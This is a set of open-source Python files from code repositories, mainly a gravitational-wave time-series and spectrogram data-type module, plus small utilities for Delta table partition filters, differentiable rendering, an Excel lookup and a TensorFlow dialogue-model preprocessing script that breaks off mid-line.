f'Re_{self._info}')\n\n @property\n def imag(self):\n return Series(self._value.imag, self._deltax, info = f'Im_{self._info}')\n\n def conjugate(self):\n return Series(self._value.conjugate(), self._deltax, info = f'Conj_{self._info}')\n\n def __str__(self):\n return f'{self._info}: {self._value}'\n \n def __repr__(self):\n return self.__str__()\n \n def __format__(self):\n return self.__str__()\n \n def __iter__(self):\n for x in self._value:\n yield x\n\n def __getitem__(self, key):\n if isinstance(key, np.int):\n return self._value[key]\n return self._getslice(key)\n\n def _getslice(self, index):\n if isinstance(index, slice): \n if index.start is not None and index.start < 0:\n raise ValueError(('Negative start index ({}) is not supported').format(index.start))\n \n if index.step is not None:\n new_deltax = self.deltax * index.step\n else:\n new_deltax = self.deltax\n return Series(self._value[index], deltax = new_deltax)\n if isinstance(index, np.ndarray):\n if len(index) == 1:\n return self._value[index]\n # Check uniform\n grad = np.gradient(index)\n if max(grad) != min(grad):\n raise ValueError(f'Invalid index for Series: {index}')\n step = index[1] - index[0]\n new_deltax = self._deltax * step\n return Series(self._value[index], deltax = new_deltax)\n\n \n def __setitem__(self, key, val):\n self._value[key] = val\n\n def resample(self, new_deltax):\n if new_deltax != self.deltax:\n new = resample(self.value, 1./self.deltax, 1./new_deltax)\n return Series(new, new_deltax, info = self._info)\n else:\n return self\n\n\nclass TimeSeries(Series):\n def __init__(self, value, epoch, fs, info = 'TimeSeries'):\n super(TimeSeries, self).__init__(value, 1./fs, info = info)\n self._epoch = epoch\n \n @property\n def fs(self):\n return int(1./self._deltax)\n \n @property\n def time(self):\n return self._epoch + self.x\n \n @property\n def duration(self):\n return self.length\n \n @property\n def epoch(self):\n return self._epoch\n \n def resample(self, fs_new):\n if fs_new != self.fs:\n new = resample(self.value, self.fs, fs_new)\n return TimeSeries(new, epoch=self.epoch, fs=self.fs, info=self.info)\n else:\n return self\n\n def plot(self, fsave, gps = 0,\n xrange = None, yrange = None,\n xlabel = None, ylabel = None,\n figsize = None, pset = None,\n title = None):\n if figsize is None:\n figsize = (10, 5)\n if pset in (None, 'origin',):\n val = self.value\n if pset in ('abs', 'snr'):\n val = np.abs(self.value)\n if title is None:\n title = self._info\n if xrange is 
None:\n xrg = None\n else:\n xrg = (xrange[0] - gps, xrange[1] - gps)\n plt.figure(figsize = figsize)\n plt.plot(self.time - gps, val)\n if gps == 0:\n plt.xlabel(f'gps time')\n else:\n if xrg is None:\n gpsini = self.time[0]\n else:\n gpsini = xrg[0] + gps\n plt.xlabel(f'gps time since {gpsini}')\n plt.xlim(xrg)\n plt.ylim(yrange)\n plt.title(title)\n plt.savefig(fsave, dpi = 200)\n plt.close()\n\n \n\nclass MultiSeries(object):\n def __init__(self, array, deltax, y):\n array = np.asarray(array)\n if len(array.shape) == 1:\n if array.shape[0] > 0:\n array = array.reshape(1, array.size)\n self._isempty = False\n else:\n array = np.array([])\n self._isempty = True\n else:\n self._isempty = False\n self._array = array\n if not self._isempty:\n self._deltax = deltax\n if isinstance(y, np.int) or isinstance(y, np.float):\n y = [y]\n y = np.asarray(y)\n if len(y) > 0:\n if (len(y.shape) != 1 and y.shape[0] != 1):\n raise Exception(f'Shape error for y: {y.shape}')\n if y.size != self._array.shape[0]:\n raise Exception(f'Incompatible size for y: {y.size}')\n self._y = y.reshape(y.size)\n else:\n raise Exception(f'Invalid variable: {y}')\n else:\n self._deltax = None\n self._y = None\n \n @property\n def array(self):\n return self._array\n\n @property\n def y(self):\n return self._y\n\n @property\n def deltax(self):\n return self._deltax\n\n @property\n def x(self):\n return np.arange(0, self.length, self._deltax)\n\n def __len__(self):\n return self.shape[1]\n\n @property\n def ysize(self):\n return self.shape[0]\n\n @property\n def length(self):\n return self.xsize * self._deltax\n \n @property\n def height(self):\n return self._y[-1] - self._y[0]\n\n @property\n def xsize(self):\n return self.shape[1]\n\n @property\n def shape(self):\n return self._array.shape\n\n def __iter__(self):\n for i in range(self.ysize):\n yield (self.y[i], Series(self._array[i,:], self.deltax))\n\n def append(self, series, y):\n if not isinstance(series, Series):\n series = Series(series, self.deltax)\n if not self._isempty:\n if len(series) != self.xsize:\n raise Exception(f'Incompatible size: {series.size} != {self.xsize}')\n if series.deltax != self.deltax:\n raise Exception(f'Incompatible deltax: {series.deltax} != {self.deltax}')\n if y > self._y[-1]:\n idx_insert = self.ysize\n self._array = np.insert(self._array, idx_insert, series.value, axis=0)\n self._y = np.insert(self._y, idx_insert, y)\n else:\n idx_insert = np.where(self._y - y >= 0)[0][0]\n if self._y[idx_insert] == y:\n self._array[idx_insert,:] = series.value\n else:\n self._array = np.insert(self._array, idx_insert, series.value, axis=0)\n self._y = np.insert(self._y, idx_insert, y)\n else:\n size = series.size\n self._deltax = series.deltax\n self._array = series.value.reshape(1, size)\n if not isinstance(y, np.int) or not isinstance(y, np.float):\n raise TypeError(f'Invalid type: {type(y)}')\n self._y = np.array([y])\n\n\n\n \nclass TimeFreqSpectrum(MultiSeries):\n def __init__(self, array, epoch, fs, freqs, info = 'TimeFreqSpectrum'):\n super(TimeFreqSpectrum, self).__init__(array, 1./fs, freqs)\n self._info = info\n if not self._isempty:\n if isinstance(epoch, np.int) or isinstance(epoch, np.float):\n epoch = [epoch]\n epoch = np.asarray(epoch)\n if len(epoch) == 1:\n self._epoch = np.ones(self.ysize) * epoch[0]\n elif len(epoch) == self.ysize:\n self._epoch = epoch\n else:\n raise Exception(f'Incompatible shape for epoch: {epoch.shape}')\n else:\n epoch = None\n @property\n def epoch(self):\n return self._epoch\n\n @property\n def 
trange(self):\n epoch_min = min(self.epoch)\n epoch_max = max(self.epoch)\n return epoch_max, epoch_min + self.length\n\n @property\n def times(self):\n return np.arange(self.trange[0], self.trange[1], self._deltax)\n \n @property\n def fs(self):\n return 1./self.deltax\n \n @property\n def frequencies(self):\n return self.y\n\n def __iter__(self):\n for i in range(self.ysize):\n yield (self.frequencies[i], TimeSeries(self._array[i,:], self.epoch[i], self.fs, info = self._info))\n \n def append(self, timeseries, freq, epoch = None, fs = None):\n if not isinstance(timeseries, TimeSeries) and epoch is None:\n raise TypeError(f'Invalid type: {timeseries}')\n elif epoch is not None and isinstance(timeseries, np.ndarray):\n value = timeseries\n if fs is None:\n deltax = self.deltax\n else:\n deltax = 1./fs\n size = value.size\n else:\n value = timeseries.value\n epoch = timeseries.epoch\n deltax = timeseries.deltax\n size = timeseries.size\n \n\n if not self._isempty:\n if size != self.xsize:\n raise Exception(f'Incompatible size: {timeseries.size} != {self.xsize}')\n if deltax != self.deltax:\n raise Exception(f'Incompatible deltax: {timeseries.deltax} != {self.deltax}')\n if freq > self._y[-1]:\n idx_insert = self.ysize\n self._array = np.insert(self._array, idx_insert, value, axis=0)\n self._epoch = np.insert(self._epoch, idx_insert, epoch)\n self._y = np.insert(self._y, idx_insert, freq)\n else:\n idx_insert = np.where(self._y - freq >= 0)[0][0]\n if self._y[idx_insert] == freq:\n self._array[idx_insert, :] = value\n self._epoch[idx_insert] = epoch\n else:\n self._array = np.insert(self._array, idx_insert, value, axis=0)\n self._epoch = np.insert(self._epoch, idx_insert, epoch)\n self._y = np.insert(self._y, idx_insert, freq)\n else:\n self._array = value.reshape(1, size)\n self._epoch = np.array([epoch])\n self._y = np.array([freq])\n self._deltax = deltax\n self._isempty = False\n\n def interpolate(self, t_interp):\n ret = np.zeros([self.ysize, len(t_interp)], self._array.dtype)\n for i, epoch in enumerate(self.epoch):\n ret[i,:] = np.interp(t_interp, self.x + epoch, self._array[i,:])\n return ret\n\n def get_finterp(self, pset = None):\n xp = self.times\n yp = self.frequencies\n zp = self.interpolate(xp)\n if pset in ('abs',):\n zp = np.abs(zp)\n if zp.dtype == complex:\n return interp2d_complex(xp, yp, zp)\n else:\n return interp2d(xp, yp, zp)\n\n def plot_spectrum(self, times, freqs,\n fsave,\n figsize = None, \n cmaptype = 'jet', pcolorbins = 100,\n xlabel = None, ylabel = None,\n xlim = None, ylim = None,\n yticks = None,\n title = None):\n # plot setting\n if figsize is None:\n figsize = (12, 7)\n cmap = plt.get_cmap(cmaptype)\n if ylim is None:\n ylim = [self.frequencies[0], self.frequencies[-1]]\n if yticks is None:\n yticksval = np.logspace(np.log10(ylim[0]), np.log10(ylim[1]), 5)\n yticks = (yticksval, ['%.1f'%_freq for _freq in yticksval])\n if title is None:\n title = self._info\n\n x = times\n y = freqs\n z = self.get_finterp(pset = 'abs')(x,y)\n if xlabel is None:\n idx_tpeak_0, idx_fpeak_0 = get_2D_argpeak(z)\n tpeak = '%.2f'%x[idx_tpeak_0]\n fpeak = '%.1f'%y[idx_fpeak_0]\n snrpeak = '%.3f'%z[idx_fpeak_0, idx_tpeak_0]\n xlabel = f'loudest snr = {snrpeak}, at geocent gps = {tpeak}, f = {fpeak}'\n\n levels = MaxNLocator(nbins=pcolorbins).tick_values(z.min(), z.max())\n norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\n\n fig = plt.figure(figsize = figsize)\n ax = fig.add_subplot(111)\n im = ax.pcolormesh(x, y, z, cmap = cmap, norm = norm)\n fig.colorbar(im, ax=ax)\n 
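# annotate the axes, switch to a log frequency scale, and save the figure
        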
plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.ylim(ylim)\n plt.xlim(xlim)\n plt.yscale('log')\n if isinstance(yticks, tuple):\n plt.yticks(*yticks)\n plt.savefig(fsave ,dpi = 200)\n plt.close()\n\n def plot_spectrum_with_track(self,\n tmpl, gps_trigger, fsave,\n figsize = None, \n cmaptype = 'jet', pcolorbins = 100,\n xlabel = None, ylabel = None,\n yticks = None,\n title = None):\n # Track\n track_x, track_y = tmpl.get_track(gps_trigger,0)\n ntrack = len(track_x)\n if ntrack > 1e4:\n fs_plot = int(self.fs * (1e4 / ntrack))\n track_x = resample(track_x, tmpl.fs, fs_plot)\n track_y = resample(track_y, tmpl.fs, fs_plot)\n ntrack = len(track_x)\n else:\n fs_plot = self.fs\n # plot setting\n if figsize is None:\n figsize = (12, 7)\n cmap = plt.get_cmap(cmaptype)\n ylim = (self.frequencies[0], self.frequencies[-1])\n xlim = (max(track_x[0] - 0.5, self.trange[0]), min(track_x[-1] + 0.5, self.trange[1]))\n if yticks is None:\n yticksval = np.logspace(np.log10(ylim[0]), np.log10(ylim[1]), 5)\n yticks = (yticksval, ['%.1f'%_freq for _freq in yticksval])\n \n if title is None:\n title = self._info\n\n x = np.arange(xlim[0], xlim[1], 1./fs_plot)\n y = np.logspace(np.log10(ylim[0]), np.log10(ylim[1]), 500)\n func = self.get_finterp(pset = 'abs')\n z = func(x,y)\n\n if xlabel is None:\n idx_tpeak_0, idx_fpeak_0 = get_2D_argpeak(z)\n tpeak = '%.2f'%x[idx_tpeak_0]\n fpeak = '%.1f'%y[idx_fpeak_0]\n snrpeak = '%.3f'%z[idx_fpeak_0, idx_tpeak_0]\n xlabel = f'loudest snr = {snrpeak}, at geocent gps = {tpeak}, f = {fpeak}'\n\n levels = MaxNLocator(nbins=pcolorbins).tick_values(z.min(), z.max())\n norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\n\n fig = plt.figure(figsize = figsize)\n plt.title(title)\n ax1 = fig.add_subplot(111)\n im = ax1.pcolormesh(x, y, z, cmap = cmap, norm = norm)\n fig.colorbar(im, ax=ax1)\n plt.plot(track_x, track_y, '-', color='#ba7b00', zorder=3, lw=1.5)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.ylim(ylim)\n plt.xlim(xlim)\n plt.yscale('log')\n if isinstance(yticks, tuple):\n plt.yticks(*yticks)\n # Plot track evolution\n plt.savefig(fsave ,dpi = 200)\n plt.close()\n\n def calc_trace_val(self, track_x, track_y, max_search = 5):\n ret = []\n freqs = []\n for i,freq in enumerate(self.frequencies):\n if freq < track_y[0] or freq > track_y[-1]:\n continue\n gps = track_x[get_idx(track_y, freq)]\n times = self.epoch[i] + self.x\n idxes = np.where( np.abs(times - gps) < max_search/freq )[0]\n ret.append(np.max(self._array[i, idxes]))\n freqs.append(freq)\n return np.asarray(ret), np.asarray(freqs)\n\n\n def calc_trace(self, tmpl, gps_trigger,\n back_collect_num = 250, thresh = 0.9, wide = 1):\n track_x, track_y = tmpl.track\n SNR_median = np.median(self._array)\n tlim_start, tlim_end = self.trange\n # Get gps trigger index\n idx_gps_trigger = int( (gps_trigger - self.epoch[-1]) * self.fs )\n idx_gps_wide = int( wide * self.fs )\n idx_gps_start = int( (self.epoch[-1] - self.epoch[0]) * self.fs )\n # Get track\n re_track_x, re_track_y = track_wrapper(track_x, track_y, gps_trigger, tlim_start, tlim_end)\n trigger_traceSNR, freqs = self.calc_trace_val(re_track_x, re_track_y)\n trigger_traceSNR_int = np.sum(trigger_traceSNR) / len(trigger_traceSNR)\n # Set threshold\n thresh = trigger_traceSNR_int * thresh\n background = []\n count = 0\n snrs = self._array[:,idx_gps_start:(idx_gps_trigger - idx_gps_wide)]\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) < back_collect_num:\n while(1):\n thresh = thresh * 0.95\n indexes = np.where(snrs > thresh)[1]\n if 
len(indexes) >= back_collect_num:\n break\n elif len(indexes) > 100*back_collect_num:\n while(1):\n thresh = thresh * 1.05\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) <= 100*back_collect_num:\n break\n\n idx_recent = -100\n for idx in indexes:\n if idx - idx_recent < 50:\n idx_recent = idx\n continue\n idx_recent = idx\n this_gps = self.epoch[-1] + self.x[idx]\n re_track_x, re_track_y = track_wrapper(track_x, track_y, this_gps, tlim_start, tlim_end)\n if re_track_x is None:\n continue\n back_trackSNR = self.calc_trace_val(re_track_x, re_track_y)[0]\n background.append(back_trackSNR)\n count += 1\n if count > back_collect_num:\n return trigger_traceSNR, freqs, background\n return trigger_traceSNR, freqs, background\n\n def calc_background_track(self, tmpl, back_collect_num = 250, wide = 1):\n # Get track\n track_x, track_y = tmpl.track\n SNR_median = np.median(self._array)\n SNR_max = np.max(self._array)\n tlim_start, tlim_end = self.trange\n # Set threshold\n thresh = (SNR_max + SNR_median) / 2\n background = []\n count = 0\n # Get gps trigger index\n idx_gps_end = len(self.epoch) - int( wide * self.fs )\n idx_gps_start = int( (self.epoch[-1] - self.epoch[0]) * self.fs )\n snrs = self._array[:,idx_gps_start:idx_gps_end]\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) < back_collect_num:\n while(1):\n thresh = thresh * 0.95\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) >= back_collect_num:\n break\n elif len(indexes) > 100*back_collect_num:\n while(1):\n thresh = thresh * 1.05\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) <= 100*back_collect_num:\n break\n\n idx_recent = -100\n for idx in indexes:\n if idx - idx_recent < 50:\n idx_recent = idx\n continue\n idx_recent = idx\n this_gps = self.epoch[-1] + self.x[idx]\n re_track_x, re_track_y = track_wrapper(track_x, track_y, this_gps, tlim_start, tlim_end)\n if re_track_x is None:\n continue\n back_trackSNR = self.calc_trace_val(re_track_x, re_track_y)[0]\n background.append(np.average(back_trackSNR))\n count += 1\n if count > back_collect_num:\n return background\n return background\n\n\n\ndef track_wrapper(track_x, track_y, gps, limit_start, limit_end):\n track_x = track_x + gps\n ini = track_x[0]\n end = track_x[-1]\n deltax = track_x[1] - ini\n if ini > limit_end or end < limit_start:\n return None, None\n if ini < limit_start:\n idx_start = int((limit_start - ini) / deltax) + 1\n else:\n idx_start = 0\n \n if end > limit_end:\n idx_end = int( (limit_end - ini) / deltax ) - 1\n else:\n idx_end = len(track_x)\n return track_x[idx_start:idx_end], track_y[idx_start:idx_end]\n\ndef calc_track_integration(func, track_x, track_y):\n ntrack = len(track_x)\n idx_trace = np.arange(ntrack)\n trace = func(track_x, track_y)[idx_trace, idx_trace]\n return trace\n\ndef get_idx(arr, val):\n delta = np.abs(arr - val)\n return np.argmin(delta)\n\ndef get_2D_argpeak(matrix):\n arg = np.where(matrix == np.max(matrix))\n return arg[1][0], arg[0][0]\n\n","repo_name":"Shallyn/pygwcoh","sub_path":"_datatypes/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":21618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32177304265","text":"from __future__ import annotations\n\nfrom typing import cast\n\nfrom .types import Filter, Filters\n\n\ndef get_partition_filters(\n partition_columns: list[str], filters: Filters\n) -> list[list[Filter]] | None:\n \"\"\"Retrieve only filters on partition columns. 
If there are any row filters in the outer\n list (the OR list), return None, because we have to search through all partitions to apply\n row filters\n\n Parameters\n ----------\n partition_columns : List[str]\n List of partitioned columns\n\n filters : List[Tuple[str, str, Any]] | List[List[Tuple[str, str, Any]]]\n List of filters. Examples:\n 1) (x == a) and (y == 3):\n [(\"x\", \"==\", \"a\"), (\"y\", \"==\", 3)]\n 2) (x == a) or (y == 3)\n [[(\"x\", \"==\", \"a\")], [(\"y\", \"==\", 3)]]\n\n Returns\n -------\n List[List[Tuple[str, str, Any]]] | None\n List of partition filters, None if we can't apply a filter on partitions because\n row filters are present\n \"\"\"\n if filters is None or len(filters) == 0:\n return None\n\n if isinstance(filters[0][0], str):\n filters = cast(list[list[Filter]], [filters])\n\n allowed_ops = {\n \"=\": \"=\",\n \"==\": \"=\",\n \"!=\": \"!=\",\n \"!==\": \"!=\",\n \"in\": \"in\",\n \"not in\": \"not in\",\n \">\": \">\",\n \"<\": \"<\",\n \">=\": \">=\",\n \"<=\": \"<=\",\n }\n\n expressions = []\n for disjunction in filters:\n inner_expressions = []\n for col, op, val in disjunction:\n if col in partition_columns:\n normalized_op = allowed_ops[op]\n inner_expressions.append((col, normalized_op, val))\n if inner_expressions:\n expressions.append(inner_expressions)\n else:\n return None\n\n return expressions if expressions else None\n","repo_name":"dask-contrib/dask-deltatable","sub_path":"dask_deltatable/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"20901800825","text":"import torch\nimport torch.optim\nimport torch.nn as nn\nimport torch.autograd as autograd\nfrom torch.autograd import Variable\nimport render_pytorch\nimport image\nimport camera\nimport material\nimport light\nimport shape\nimport numpy as np\nimport math\nimport random\nimport load_obj\n\ndef safe_asin(x):\n \"\"\"\n return pi/2 if x == 1, otherwise return asin(x)\n \"\"\"\n safe_x = torch.where(x < 1, x, torch.zeros_like(x))\n return torch.where(x < 1, torch.asin(safe_x), (math.pi/2) * torch.ones_like(x))\n\ndef length(x):\n return torch.sqrt(torch.sum(x * x, 1))\n\ndef compute_vertex_normal(vertices, indices):\n # Nelson Max, \"Weights for Computing Vertex Normals from Facet Vectors\", 1999\n normals = torch.zeros_like(vertices)\n v = [vertices[indices[:, 0]],\n vertices[indices[:, 1]],\n vertices[indices[:, 2]]]\n for i in range(3):\n v0 = v[i]\n v1 = v[(i + 1) % 3]\n v2 = v[(i + 2) % 3]\n e1 = v1 - v0\n e2 = v2 - v0\n e1_len = length(e1)\n e2_len = length(e2)\n side_a = e1 / e1_len.view([-1, 1])\n side_b = e2 / e2_len.view([-1, 1])\n if i == 0:\n n = torch.cross(side_a, side_b)\n n = n / length(n).view([-1, 1])\n angle = torch.where(torch.sum(side_a * side_b, 1) < 0, \n math.pi - 2.0 * safe_asin(0.5 * length(side_a + side_b)),\n 2.0 * safe_asin(0.5 * length(side_b - side_a)))\n sin_angle = torch.sin(angle)\n \n normals[indices[:, i]] += n * (sin_angle / (e1_len * e2_len)).view([-1, 1])\n\n normals = normals / length(normals).view([-1, 1])\n return normals\n\nresolution = [256, 256]\ncam = camera.Camera(position = np.array([0, 3, -6], dtype=np.float32),\n look_at = np.array([0, 0, 0], dtype=np.float32),\n up = np.array([0, 1, 0], dtype=np.float32),\n cam_to_world = None,\n fov = 45.0,\n clip_near = 0.01,\n clip_far = 10000.0,\n resolution = 
resolution)\nmat_grey=material.Material(diffuse_reflectance=torch.from_numpy(np.array([0.5,0.5,0.5],dtype=np.float32)))\nmat_black=material.Material(diffuse_reflectance=torch.from_numpy(np.array([0.0,0.0,0.0],dtype=np.float32)))\nmaterials=[mat_grey,mat_black]\n# plane_vertices, plane_indices=generate_plane([32, 32])\n# shape_plane=shape.Shape(plane_vertices,plane_indices,None,None,0)\nindices, vertices, uvs, normals = load_obj.load_obj('results/heightfield_gan/model.obj')\nindices = Variable(torch.from_numpy(indices.astype(np.int64)))\nvertices = Variable(torch.from_numpy(vertices))\nnormals = compute_vertex_normal(vertices, indices)\nshape_plane=shape.Shape(vertices,indices,None,normals,0)\nlight_vertices=Variable(torch.from_numpy(\\\n np.array([[-0.1,50,-0.1],[-0.1,50,0.1],[0.1,50,-0.1],[0.1,50,0.1]],dtype=np.float32)))\nlight_indices=torch.from_numpy(\\\n np.array([[0,2,1],[1,2,3]],dtype=np.int32))\nshape_light=shape.Shape(light_vertices,light_indices,None,None,1)\nshapes=[shape_plane,shape_light]\nlight_intensity=torch.from_numpy(\\\n np.array([100000,100000,100000],dtype=np.float32))\nlight=light.Light(1,light_intensity)\nlights=[light]\n\nrender = render_pytorch.RenderFunction.apply\nargs = render_pytorch.RenderFunction.serialize_scene(\\\n cam,materials,shapes,lights,resolution,4,1)\nimg = render(random.randint(0, 1048576), *args)\nimage.imwrite(img.data.numpy(), 'results/heightfield_gan/test.exr')","repo_name":"BachiLi/delta_ray","sub_path":"test/test_heightfield.py","file_name":"test_heightfield.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37807218718","text":"import pickle\nimport readline\n\nwith open('data/table.pkl', 'rb') as f:\n table = pickle.load(f)\n\nwith open('data/freq.pkl', 'rb') as f:\n freq = pickle.load(f)\n\nwith open('data/rev.pkl', 'rb') as f:\n rev = pickle.load(f)\n\n\ndef query_keys(keys):\n if keys[0] == 'r':\n keys = keys[1:]\n if keys in rev:\n return rev[keys]\n else:\n return 'Not in dict'\n elif keys in table:\n res = table[keys]\n res.sort(key=lambda x: -freq[x])\n res = res[:min(10, len(res))]\n return res\n else:\n return 'Not in dict'\n\n\ndef interactive():\n while True:\n keys = input('> ')\n if keys == '':\n continue\n if keys == 'q':\n break\n print(query_keys(keys))\n\n\nif __name__ == '__main__':\n interactive()","repo_name":"amoshyc/ccu-data-engineering","sub_path":"final/model0.py","file_name":"model0.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71895138614","text":"'''\n@ Author - Yogesh Pawar\n@ Creation date - 02/10/2020\n@ Description - SVC Utility\n'''\n\n#1st parameter = requird parameter sheet\n#2nd parameter = excel for data process\n#3rd parameter = which column value end user looking for\n\nimport openpyxl\n# import self\n\nv_input_wb = openpyxl.load_workbook(\"C:/Users/yogesh.pawar/Downloads/Conversion_Maps.xlsx\")\nv_input_sheet = v_input_wb.get_sheet_by_name(\"Sheet1\")\ntotal_rows_input=v_input_sheet.max_row\narr=[]\n# arr.keys()=\ndic={}\nfor i in range(total_rows_input):\n sup_ver=v_input_sheet.cell(row=(i+2), column=2).value\n ret_ver=v_input_sheet.cell(row=(i+2), column=4).value\n maps=v_input_sheet.cell(row=(i+2), column=6).value\n if type(ret_ver)=='int':\n ret_ver=float(ret_ver)\n # reta_version=float(ret_ver)\n print(ret_ver)\n dict_list = str(sup_ver) + \"-\" + str(ret_ver)\n mapsw = str(maps)\n\n 
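# key each entry by its supported-retained version pair
    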
dic.update({dict_list:mapsw})\n\n # arr.ap\n # arr.append(dict_list)\n\nprint(dic)\n\n\n# v_processed_wb = openpyxl.load_workbook(process_file_path)\n# v_processed_sheet = v_processed_wb.get_sheet_by_name(\"processed\")\n# total_rows_processed=v_processed_sheet.max_row\n# total_columns_processed=v_processed_sheet.max_column\n#\n# for i in range(int(total_rows_processed)):\n# for j in range(int(total_rows_input)):\n# for k in range(int(total_columns_processed)):\n# if str(v_input_sheet.cell(row=(j+1), column=1).value)==str(v_processed_sheet.cell(row=(i+1), column=(k+1)).value):\n# v_input_sheet.cell(row=(j+1), column=2).value=v_processed_sheet.cell(row=(i+1), column=int(process_file_column_number_to_get_value)).value\n# v_input_wb.save(input_file_path)\n# print(\"Done\")\n#\n# svc_utility_excel_process(\"C:/Users/yogesh.pawar/Desktop/SVC_Shrort_automation/Input.xlsx\",\"C:/Users/yogesh.pawar/Desktop/SVC_Shrort_automation/processed.xlsx\",\"1\")\n","repo_name":"yogeshpawar811/E-Commerce_QB_Setup_Automation","sub_path":"Applications/Workflows/ServiceTimeCard/TaskCategorization/Script/create_dictionary.py","file_name":"create_dictionary.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70437043574","text":"import os\r\nimport time\r\nfrom random import randint\r\nimport collections\r\nfrom utils import *\r\nfrom numpy import *\r\nimport word2vec\r\nimport tensorflow as tf\r\n\r\n### hyper-perameters:\r\ntf.flags.DEFINE_string(\"mode\",\"train\",\"mode\")\r\ntf.flags.DEFINE_string(\"train_path\",\"./Data/Train/train_0\",\"train_path prefix, a split data of source train path\")\r\ntf.flags.DEFINE_string(\"source_train_path\",\"./Data/train.csv\",\"source train path, to build vocabulary\")\r\ntf.flags.DEFINE_string(\"dev_path\",\"./Data/dev.csv\",\"dev_path\")\r\ntf.flags.DEFINE_string(\"test_path\",\"./Data/test.csv\",\"test_path\")\r\ntf.flags.DEFINE_string(\"save_path\",\"./model/0\",\"save_path\")\r\ntf.flags.DEFINE_string(\"voca_path\",\"./voca.txt\",\"voca_path\")\r\ntf.flags.DEFINE_string(\"embedding_path\",\"./Data/embedding.bin\",\"embedding_path\")\r\n\r\nFLAGS = tf.flags.FLAGS\r\n\r\nword_to_id = {}\r\nid_to_word = {}\r\nevalProbs = []\r\ninit = None\r\nvoca_size = 0\r\n\r\nclass Config(object):\r\n\tbatch_size = 200\r\n\tlearning_rate = 0.001\r\n\tkeep_prob = 1.0\r\n\r\n\trnn_dim = 200\r\n\tembedding_size = 200\r\n\r\n\tmax_length_q = 50\r\n\tmax_length_a = 50\r\n\tmax_num_utterance = 10\r\n\r\n\tmax_epoch = 1000\r\n\tmode = FLAGS.mode\r\n\r\ndef getConfig():\r\n\treturn Config()\r\n\r\nconfig = getConfig()\r\neval_config = getConfig()\r\neval_config.keep_prob = 1\r\neval_config.mode = \"dev\"\r\n\r\ndef build_vocab():\r\n\r\n\tvoca_path = FLAGS.voca_path \r\n\tglobal word_to_id, voca_size\r\n\r\n\tif voca_path is not None and os.path.exists(voca_path):\r\n\t\tword_to_id = eval(open(voca_path).read())\r\n\t\tprint(\"Vocabulary size: %d\"%(len(word_to_id)))\r\n\t\tvoca_size = len(word_to_id)\r\n\t\treturn word_to_id\r\n\tcontext, utterance, labels = processUbuntuTrain(FLAGS.source_train_path)\r\n\tdataTuple = [context, utterance]\r\n\tdata = [list(i.reshape(-1)) for i in dataTuple] \r\n\tdata = ' '.join(data).replace(\"\\n\",\"\").split()\r\n\t#print(data)\r\n\tcounter = collections.Counter(data)\r\n\tcount_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\r\n\tcount_pairs = [(a,b) for (a,b) in count_pairs if int(b)>=5]\r\n\r\n\twords, _ = 
list(zip(*count_pairs))\r\n\tword_to_id = dict(zip(words, range(1, len(words)+1)))\r\n\tword_to_id[\"UNK\"] = len(words)+1\r\n\tword_to_id[\".\"] = 0\r\n\r\n\tif voca_path is not None:\r\n\t\tf = open(voca_path,\"w\")\r\n\t\tf.write(str(word_to_id))\r\n\t\tf.close()\r\n\tprint(\"Vocabulary size: %d\"%(len(word_to_id)))\r\n\tvoca_size = len(word_to_id)\r\n\treturn word_to_id\r\n\r\ndef file_to_id(data, mode = 0):\r\n\tunk = word_to_id[\"UNK\"]\r\n\tinputs = []\r\n\tseq_lengths = []\r\n\tfor sequences in data:\r\n\t\tsequences = sequences.split(\"\\n\")\r\n\t\tsingle_input = []\r\n\t\tseq_length = []\r\n\t\tfor line in sequences:\r\n\t\t\tline = line.split()\r\n\t\t\tll = []\r\n\t\t\tfor word in line:\r\n\t\t\t\tif word in word_to_id:\r\n\t\t\t\t\tll.append(word_to_id[word])\r\n\t\t\t\telse:\r\n\t\t\t\t\tll.append(unk)\r\n\t\t\t\r\n\t\t\tseq_length.append(len(ll))\r\n\t\t\tsingle_input.append(ll)\r\n\r\n\t\tinputs.append(single_input)\r\n\t\tseq_lengths.append(seq_length)\r\n\tif mode == 1:\r\n\t\tinputs = array(inputs).reshape(-1,1)\r\n\t\tseq_lengths = array(seq_lengths).reshape(-1,1)\r\n\treturn inputs, seq_lengths\r\n\r\ndef id_to_sentence(sentence):\r\n\tglobal id_to_word, word_to_id\r\n\tif len(id_to_word)==0:\r\n\t\tid_to_word = {v:k for k,v in word_to_id.items()}\r\n\tresult = [id_to_word[i] for i in sentence ]\r\n\tresult = \"\".join(result)\r\n\treturn result\r\n\r\ndef get_input(mode, path = None):\r\n\r\n\tif mode == \"train\":\r\n\t\tcontext, utterance, labels = processUbuntuTrain(path)\r\n\t\tbuild_vocab()\r\n\t\r\n\telse:\r\n\t\tcontext, utterance, labels = processUbuntuDev(FLAGS.dev_path)\r\n\t\tbuild_vocab()\r\n\r\n\tcontext, _ = file_to_id(context)\r\n\tutterance, seq_length_u = file_to_id(utterance, mode = 1)\r\n\tcontexts, seq_length_c = multi_sequences_padding(context, config)\r\n\tutterance = [i[0] for i in utterance]\r\n\tutterance = pad_sequences(utterance, padding='post', maxlen=config.max_length_q)\r\n\r\n\treturn contexts, utterance, seq_length_c, seq_length_u, labels\r\n\r\ndef produce_input(config, input_q, input_a, seq_length_q, seq_length_a, labels):\r\n\tinput_q = 